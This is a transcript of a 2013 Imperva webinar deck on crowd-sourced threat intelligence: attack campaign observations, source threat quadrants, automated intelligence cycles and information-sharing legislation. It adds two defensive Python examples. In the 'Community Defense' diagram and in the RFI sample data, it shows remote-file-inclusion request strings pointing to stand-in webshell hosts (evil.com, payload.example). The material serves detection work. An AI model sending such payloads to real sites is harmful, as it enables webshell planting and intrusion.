The Value of Crowd-Sourced Threat Intelligence
Transcript of The Value of Crowd-Sourced Threat Intelligence
© 2013 Imperva, Inc. All rights reserved.
Crowd Sourced Threat Intelligence
Amichai Shulman, CTO, Imperva
Confidential 1
May 2013
Agenda
§ Introduction to crowd sourcing and threat intelligence
§ Application layer threat intelligence
  • Research report
§ Actionable threat intelligence
  • Turning threat intelligence into community defense
§ Threat intelligence and legislation
  • Pros, cons and state of affairs
§ Summary & conclusions
§ Q&A
Amichai Shulman – CTO Imperva
§ Speaker at industry events
  • RSA, AppSec, Info Security UK, Black Hat
§ Lecturer on information security
  • Technion - Israel Institute of Technology
§ Former security consultant to banks & financial services firms
§ Leads the Application Defense Center (ADC)
  • Discovered over 20 commercial application vulnerabilities
§ Credited by Oracle, MS-SQL, IBM and others
Amichai Shulman is one of InfoWorld’s “Top 25 CTOs”
HII Reports
§ The Hacker Intelligence Initiative is focused on understanding how attackers operate in practice
  • A different approach from vulnerability research
§ Data set composition
  • ~60 real world applications
  • Anonymous proxies
§ More than 24 months of data
§ Powerful analysis system
  • Combines analytic tools with drill-down capabilities
Introduction
Crowd Sourcing and Threat Information Sharing
What is Crowd Sourcing
§ “The Wisdom of Crowds: Why the Many Are Smarter Than the Few and How Collective Wisdom Shapes Business, Economies, Societies and Nations”*
Crowd Sourcing in Practice
Threat Information Sharing
§ AV vendor customers sharing suspicious files with their vendors
  • Manual process
  • If not manual, then how do you define suspicious?
§ Anti-spam vendors collecting email data from all deployments
  • Privacy?
  • Confidentiality
§ Customer groups for sharing battle stories
  • Timely?
Threat Intelligence
§ Infer NEW information regarding future attacks from looking at past attacks
§ Attacks across organizations share common characteristics
  • Sources
  • Techniques
  • Tools
  • Timelines
Application Layer Threat Intelligence
Research report
Some Observations
§ Most web attacks are part of large-scale industrialized operations
  • Reuse of attack platforms
  • Reuse of techniques
  • Reuse of tools
§ Attack campaigns span meaningful time frames
More Observations
§ Izz ad-Din al-Qassam attacks on US banks
  • Started with a few banks 4 months ago
  • Gradually adding more targets to the list
§ #OpIsrael / #OpUSA / #OpColombia …
  • Attacks by hacktivists
  • Targeted for a specific time frame
  • Pick up many victims and target them with the SAME exact tools over the attack time frame
Methodology
§ Attack data only
  • 60 applications
  • 6 months of data
§ Analyze dominant attack types
  • SQL Injection
  • Remote File Include
  • Comment Spam
  • Local File Include
  • Directory Traversal
SQL Injection – Source Threat Quadrant
Chart: quadrant plot of SQL injection attack sources; quadrants: multi target, persistent sources / multi target sources / persistent sources / singletons
SQL Injection – Source Threat Quadrant
Chart: the same quadrant plot, highlighting the multi target, persistent sources
SQL Injection – Time Perspective
Chart: number of targets per day from 01/01/2013 to 28/02/2013 (y-axis: Targets, 0 to 18); series: Accumulating, Current
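As an added example (not from the deck and not Imperva's analysis system), the following Python classifies attack sources into the four cells of the source threat quadrant and computes the accumulating versus current target series of the time-perspective chart, from a small constructed sample of WAF attack events. The thresholds (two or more distinct applications = multi target, activity on two or more distinct days = persistent) and the reading of "Accumulating" as distinct targets seen so far versus "Current" as distinct targets hit on that day are assumptions; the deck does not define them.

```python
"""Source threat quadrant and time-perspective series from WAF attack events.

Added example; thresholds and chart semantics are assumptions, not the deck's.
"""
from collections import defaultdict
from datetime import date, timedelta

# Constructed sample log: one event per line as "YYYY-MM-DD source_ip target_app attack_type".
# These are made-up events, not data from the HII report.
SAMPLE_EVENTS = """
2013-01-03 198.51.100.7 shop SQLi
2013-01-03 198.51.100.7 bank SQLi
2013-01-09 198.51.100.7 forum SQLi
2013-01-20 198.51.100.7 shop SQLi
2013-01-05 203.0.113.9 shop SQLi
2013-01-05 203.0.113.9 bank SQLi
2013-01-05 203.0.113.9 forum SQLi
2013-01-04 192.0.2.33 bank SQLi
2013-01-18 192.0.2.33 bank SQLi
2013-02-02 192.0.2.33 bank SQLi
2013-01-11 192.0.2.50 forum SQLi
2013-01-11 192.0.2.50 forum SQLi
2013-01-12 192.0.2.60 shop RFI
"""


def parse_events(text):
    """Parse the log text into (date, source, target, attack_type) tuples."""
    events = []
    for line in text.strip().splitlines():
        day, src, target, kind = line.split()
        events.append((date.fromisoformat(day), src, target, kind))
    return events


def classify_sources(events, attack_type, min_targets=2, min_active_days=2):
    """Assign each source of the given attack type to one quadrant.

    multi target  := attacked at least min_targets distinct applications
    persistent    := active on at least min_active_days distinct days
    (threshold values are assumptions)
    """
    targets = defaultdict(set)
    days = defaultdict(set)
    for day, src, target, kind in events:
        if kind != attack_type:
            continue
        targets[src].add(target)
        days[src].add(day)

    quadrants = {}
    for src in targets:
        multi = len(targets[src]) >= min_targets
        persistent = len(days[src]) >= min_active_days
        if multi and persistent:
            quadrants[src] = "multi-target, persistent"
        elif multi:
            quadrants[src] = "multi-target"
        elif persistent:
            quadrants[src] = "persistent"
        else:
            quadrants[src] = "singleton"
    return quadrants


def time_perspective(events, attack_type):
    """Per calendar day, return (day, current, accumulating) where
    current = distinct targets attacked on that day and
    accumulating = distinct targets attacked from the first day up to that day.
    This reading of the chart's two series is an assumption."""
    by_day = defaultdict(set)
    for day, src, target, kind in events:
        if kind == attack_type:
            by_day[day].add(target)
    if not by_day:
        return []

    seen = set()
    series = []
    day, last = min(by_day), max(by_day)
    while day <= last:
        today = by_day.get(day, set())
        seen |= today
        series.append((day.isoformat(), len(today), len(seen)))
        day += timedelta(days=1)
    return series


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for src, quadrant in sorted(classify_sources(evs, "SQLi").items()):
        print(f"{src:15} {quadrant}")
    for day, current, accumulating in time_perspective(evs, "SQLi"):
        if current:
            print(day, "current:", current, "accumulating:", accumulating)
```

The multi-target, persistent cell is the one worth acting on first: a source that hits several unrelated applications over weeks is part of a campaign, not a one-off, and blocking or closely monitoring it protects every member of the community rather than a single site.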
Comment Spam – Source Threat Quadrant
Chart: quadrant plot of comment spam attack sources, highlighting the multi target, persistent sources
Remote File Include – URL Threat Quadrant
Chart: quadrant plot of RFI URLs, highlighting the multi target, persistent vectors
Remote File Include - Example
§ Reconnaissance campaign based on a benign URL
  • http://google.com/humans.txt
§ 11 different applications targeted using the same URL
  • 5144 different requests
§ Spread throughout an entire month
§ Next slide shows a network graph of attack sources to targets
  • We can learn about the relationship between attack sources
Remote File Include - Example
Chart: network graph of attack sources to targets
Use of Attack Tools
Chart: Percentage of Automated Attacks by attack type (RFI, LFI, SQLi, Comment Spam (ComSpm), XSS, DT); y-axis 0% to 100%; series: Total Attacks, Automated
Actionable Threat Intelligence
Turning Threat Intelligence Into Community Defense
Actionable Intelligence Life Cycle
Diagram (cycle): known attack patterns -> apply on traffic to identify attackers -> known attackers -> apply on traffic to identify new patterns -> known attack patterns
Actionable Threat Intelligence
§ Multiphase
  • Distributed data collection
  • Information extraction
  • Analysis and knowledge generation
  • Knowledge validation
  • Distribution of knowledge to devices
§ The cycle must be completely automated in order to provide value in a timely manner and at scale
  • Not an information sharing hub
The Cost of Decision Making
§ Problem scale is increasing
  • Number of attacks is constantly growing
  • Number of applications per organization is growing
§ Resources are stagnant
  • No additional headcount (HC)
§ Organizations must reduce the proportion of alerts that require human decision making
§ By introducing mechanisms based on actionable intelligence, organizations increase the accuracy of detection for a larger portion of the attacks
Threat Intelligence and Legislation
Pros, Cons and State of Affairs
Current Legislation
§ US Cyber Intelligence Sharing and Protection Act (CISPA)
  • Passed late April 2013
  • Sets up the LEGAL grounds for bilateral information sharing between private sector entities and government entities
  • Addresses issues of eligibility, liability and protection of shared information
Current Legislation
§ UK Cyber Security Information Sharing Partnership (CISP)
  • Launched late March 2013 (piloted through 2012)
  • Sets up procedural and technical grounds for information sharing between private sector and government
  • Comprises an operations room, reporting portal and program definitions
  • Similar program exists for cyber crime (CCRP)
Cons
§ Misuse of information by governments
  • Invade privacy in various ways
  • Otherwise would require a court order
§ Information sharing platform
  • Does not provide for extraction of actionable intelligence
§ Governments usually do things the wrong way
  • E.g. the complexity of the STIX language
Pros
§ Regulate how data is being anonymized and protected
§ Encourage more organizations to take part in this effort
  • Achieve better results faster
  • Reduce overall damage to the public
§ Standardize on various components
Summary & Conclusions
Summary
§ Threat intelligence has a measurable potential value for Web application attacks
§ Threat intelligence can be used to identify and detect attack sources, attack vectors and attack tools
§ Actionable threat intelligence is crucial for exploiting the potential value of threat intelligence
  • Not information sharing hubs
  • No manual processes
§ Actionable threat intelligence helps organizations reduce the cost of security decision making and enables them to handle increasing volumes of attack traffic
ThreatRadar Community Defense
§ Gathers live attack data from SecureSphere WAFs around the world
§ Distributes attack patterns and reputation data in near-real time
Community Defense – How It Works
Diagram: Internet User -> Web Servers (protected by SecureSphere) -> ThreatRadar Servers; example request shown: /vulnerable.php?C=http://evil.com/webshell.txt?
1. SecureSphere detects a possible RFI attack
2. Sends event to ThreatRadar Cloud
3. If ThreatRadar verifies the site is malicious, it will distribute the new RFI pattern to the community
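The three-step flow above is the actionable intelligence life cycle (known attack patterns -> identify attackers -> identify new patterns) applied to RFI. The following Python is an added example, not ThreatRadar's code or the deck's, of one pass round that cycle over a constructed sample of WAF-observed requests. It extracts remote URLs from query parameters (the RFI vector in the example request), uses the known URL to find attacking sources, mines the rest of those sources' traffic for new remote URLs, and admits a new URL only when it is corroborated by at least two attackers and the verification step returns "malicious". The verification itself (fetching and inspecting the remote site) is stood in for by a constructed verdict table, and the corroboration threshold is an assumption.

```python
"""One pass of the actionable intelligence cycle for RFI patterns.

Added example; the verification service and thresholds are assumptions.
"""
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample of requests seen by WAFs in the community: (source IP, path with query).
# http://evil.com/webshell.txt is the deck's example; the other hosts are made up.
SAMPLE_REQUESTS = [
    ("203.0.113.5", "/vulnerable.php?C=http://evil.com/webshell.txt?"),
    ("203.0.113.5", "/index.php?page=http://payload.example/c99.txt?"),
    ("203.0.113.5", "/index.php?page=about"),
    ("198.51.100.9", "/vulnerable.php?C=http://evil.com/webshell.txt?"),
    ("198.51.100.9", "/wp-content/plugins/x.php?inc=http://payload.example/c99.txt?"),
    ("192.0.2.88", "/index.php?page=http://payload.example/c99.txt?"),
    ("192.0.2.77", "/login.php?next=http://www.example.com/home"),
    ("192.0.2.77", "/index.php?page=contact"),
]

# Patterns the community already knows: remote URLs used in RFI attacks.
KNOWN_RFI_URLS = {"http://evil.com/webshell.txt"}

# Constructed stand-in for the verification step ("ThreatRadar verifies site is
# malicious"). A real implementation would inspect the remote site; this does not.
SAMPLE_VERDICTS = {"http://payload.example/c99.txt": True,
                   "http://www.example.com/home": False}


def remote_urls_in_request(path_with_query):
    """Return query-parameter values that are absolute http(s) URLs, with the
    trailing '?' that RFI payloads append (to discard the rest of the include
    path) stripped so that variants normalise to one pattern."""
    query = urlsplit(path_with_query).query
    return [value.rstrip("?")
            for _, value in parse_qsl(query, keep_blank_values=True)
            if value.startswith(("http://", "https://"))]


def identify_attackers(requests, known_urls):
    """Phase 1: apply known patterns to traffic; sources using them are attackers."""
    return {src for src, path in requests
            if any(u in known_urls for u in remote_urls_in_request(path))}


def candidate_patterns(requests, attackers, known_urls):
    """Phase 2: look at the attackers' other traffic for not-yet-known remote URLs.
    Returns url -> set of attacker sources that used it."""
    candidates = defaultdict(set)
    for src, path in requests:
        if src not in attackers:
            continue
        for url in remote_urls_in_request(path):
            if url not in known_urls:
                candidates[url].add(src)
    return candidates


def validate(candidates, verdicts, min_sources=2):
    """Knowledge validation: keep candidates corroborated by at least
    min_sources attackers (assumed threshold) and verified malicious."""
    return {url for url, srcs in candidates.items()
            if len(srcs) >= min_sources and verdicts.get(url) is True}


def run_cycle(requests, known_urls, verdicts):
    """Run one pass; return (attackers found, updated known pattern set)."""
    attackers = identify_attackers(requests, known_urls)
    new_urls = validate(candidate_patterns(requests, attackers, known_urls), verdicts)
    return attackers, set(known_urls) | new_urls


if __name__ == "__main__":
    known = KNOWN_RFI_URLS
    for i in (1, 2):
        attackers, known = run_cycle(SAMPLE_REQUESTS, known, SAMPLE_VERDICTS)
        print(f"pass {i}: attackers={sorted(attackers)} known={sorted(known)}")
```

Two things the sample is built to show. The benign-looking redirect parameter from 192.0.2.77 carries a URL too, but it never becomes a candidate because that source was not identified as an attacker and, even if it had been, the verdict is not malicious; both gates matter, since the deck's own RFI example shows a reconnaissance campaign built on a benign URL. And 192.0.2.88 is only caught on the second pass: it used the new payload URL alone, so it is invisible until the first pass has distributed that URL as a known pattern, which is exactly the community benefit of closing the loop automatically.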
Webinar Materials
Post-Webinar Discussions
Answers to Attendee Questions
Webinar Recording Link
Join Imperva LinkedIn Group, Imperva Data Security Direct, for…
www.imperva.com